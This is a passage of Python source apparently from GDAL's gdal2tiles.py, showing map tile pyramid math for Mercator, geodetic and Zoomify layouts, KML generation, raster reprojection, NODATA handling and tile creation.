More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
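# Illustrative sketch, not part of the original script: a worked example of the conversion
# chain described in the GlobalMercator docstring. The sample coordinate and zoom level are
# arbitrary assumptions and the helper is never called.
def _example_mercator_conversions(lat=50.0, lon=14.0, zoom=10):
    mercator = GlobalMercator()
    mx, my = mercator.LatLonToMeters(lat, lon)      # WGS84 lat/lon -> EPSG:3857 meters
    tx, ty = mercator.MetersToTile(mx, my, zoom)    # meters -> TMS tile indices
    gx, gy = mercator.GoogleTile(tx, ty, zoom)      # TMS -> Google tile (y counted from top-left)
    quadkey = mercator.QuadTree(tx, ty, zoom)       # TMS -> Microsoft QuadTree key
    print("meters:", (mx, my))
    print("TMS tile:", (tx, ty), "Google tile:", (gx, gy), "quadkey:", quadkey)
    print("resolution at zoom %d: %f m/pixel" % (zoom, mercator.Resolution(zoom)))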
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
            # Adheres to the OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
            # Adheres to the OpenLayers, MapProxy, etc. default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
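# Illustrative sketch, not part of the original script: the two GlobalGeodetic layouts
# described in __init__, printed rather than asserted; the helper is never called.
def _example_geodetic_profiles():
    two_tiles = GlobalGeodetic(tmscompatible=True)   # 2 tiles at level 0, 0.703125 deg/pixel
    one_tile = GlobalGeodetic(tmscompatible=None)    # 1 tile at level 0, 1.40625 deg/pixel
    print("resolution at zoom 0:", two_tiles.Resolution(0), one_tile.Resolution(0))
    print("tile covering lon/lat (14, 50) at zoom 5:", two_tiles.LonLatToTile(14.0, 50.0, 5))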
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
        # Image size in pixels for each pyramid tier
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
        self.tileCountUpToTier = [0]
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
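# If the tile file already exists (overview/resume case), composite the new image over it
# using the new image's alpha channel.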
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
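# Trick: fake geotransforms map the large query raster onto the tile raster so that
# ReprojectImage() performs a pure rescale with the chosen algorithm (no real reprojection).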
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset, or use the passed arguments as an override if given
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the input Spatial Reference System (SRS) as an osr object and as a
WKT representation.
The SRS passed on the command line takes priority; otherwise it is extracted from the
input dataset.
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
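# Walk the top-level elements: count the existing VRTRasterBand nodes and remember the
# position just after the last one, where the new alpha band element will be inserted.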
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles datasets with 1 or 3 bands, i.e. without an alpha channel, in case the NODATA value
has not been forced by the options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail, queue=None):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
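# Cache the opened source dataset per worker via threadLocal; GDAL dataset handles should
# not be shared across threads, so each worker keeps its own.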
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# The query is read with 'nearest neighbour' but can be bigger than the tile_size;
# we scale it down to the tile_size with the requested resampling algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on wavelet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns a high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tile_size - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ty, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (y, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
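# Place the child tile in the proper quadrant of the 2x query window; TMS y grows
# northwards, so the child with the larger y lands in the top half (tileposy == 0).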
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
